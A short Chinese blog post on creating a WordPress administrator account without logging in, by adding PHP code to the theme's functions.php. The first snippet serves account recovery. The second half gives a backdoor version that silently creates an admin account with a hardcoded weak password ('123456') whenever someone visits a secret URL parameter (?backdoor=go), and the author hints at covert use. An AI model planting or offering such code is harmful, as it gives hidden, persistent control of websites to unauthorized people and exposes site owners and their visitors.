不登录WordPress后台直接新建一个管理员账号

之前“找回 WordPress 登录密码”文章提供的找回登录密码方法有一个局限性,就是如果连登录名和邮件地址也忘了(该找医生看看了),还是无法解决,这里再提供一个方法。

不登录WordPress 后台直接新建一个管理员账号

可以通过FTP,将下面代码添加到当前主题函数模板functions.php中,然后刷新页面会新建一个管理员账号:

// 新建一个管理账号
$user_email = \'123@123.com\';
$user_password = \'123456\';
if ( !username_exists( $user_email ) ) {
	$user_id = wp_create_user( $user_email, $user_password, $user_email );
	wp_update_user( array( \'ID\' => $user_id, \'nickname\' => $user_email ) );
	$user = new WP_User( $user_id );
	$user->set_role( \'administrator\' );
	wp_die( \'添加用户成功!\' );
} else {
	wp_die( \'该用户已经存在,用后请移除本代码!\' );
}

修改其中的邮件地址和密码

$user_email = \'123@123.com\';
$user_password = \'123456\';

刷新页面会提示:该用户已经存在,用后请移除本代码!,说明用户已添加成功,将添加的代码移除,覆盖还原。

登录新建的管理员账号,修改原来账号的密码或者直接删除原来的账号。


这段代码还有一个不可告人的功能,稍微改一下,变成后门!

这段代码还有一个不可告人的功能,稍微改一下,变成后门!双刃剑看怎么用了。

if ($_GET[\'backdoor\'] == \'go\') {
	$user_email = \'123@123.com\';
	$user_password = \'123456\';
	if ( !username_exists( $user_email ) ) {
		$user_id = wp_create_user( $user_email, $user_password, $user_email );
		wp_update_user( array( \'ID\' => $user_id, \'nickname\' => $user_email ) );
		$user = new WP_User( $user_id );
		$user->set_role( \'administrator\' );
		wp_die( \'添加用户成功!\' );
	} else {
		wp_die( \'该用户已经存在,用后请移除本代码!\' );
	}
}

只有打开一个特定的链接,比如:

example.com/?backdoor=go

才会运行这段代码,并新建管理账号,至于目的是什么,自己想像吧。

    © 版权声明
    THE END
    喜欢就支持一下吧
    点赞0分享
    评论 抢沙发

    请登录后发表评论

      暂无评论内容